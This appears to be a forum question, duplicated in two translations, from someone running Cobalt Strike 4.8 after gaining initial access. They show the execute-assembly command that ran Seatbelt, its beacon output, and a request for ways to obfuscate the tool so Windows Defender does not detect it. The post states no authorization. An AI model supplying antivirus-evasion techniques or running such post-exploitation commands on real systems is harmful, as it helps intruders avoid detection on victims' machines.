I received initial access and began post-exploitation with Cobalt Strike 4.8. I wanted to start the list with Seatbelt. After it was run, Seatbelt.exe was discovered by Windows Defender and removed.
My question is: how do I make it so that Seatbelt is not detected? Are there any ways of obfuscation?
Here is the command I used in Cobalt Strike 4.8:
execute-assembly /path/to/Seatbelt.exe -group=all
Output:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[08/16 12:38:39] [*] Tasked beacon to run .NET program: Seatbelt.exe
[08/16 12:38:39] [+] host called home, sent: 276011 bytes
[08/16 12:38:40] [+] received output:
Failed to load the assembly w/hr 0x8007000b
------ENGLISH VERSION------
How to make the Ghost Binary "Seatbelt.exe" undetected for Cobalt Strike 4.8
I got initial access and started the post-exploitation phase with Cobalt Strike 4.8. I wanted to start enumeration with Seatbelt. After executing, Seatbelt.exe was detected by Windows Defender and then deleted.
My question is: How do I make Seatbelt undetected? Are there any ways to obfuscate it?
This is the command I used in Cobalt Strike 4.8
execute-assembly /path/to/Seatbelt.exe -group=all
The Output:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[08/16 12:38:39] [*] Tasked beacon to run .NET program: Seatbelt.exe
[08/16 12:38:39] [+] host called home, sent: 276011 bytes
[08/16 12:38:40] [+] received output:
Failed to load the assembly w/hr 0x8007000b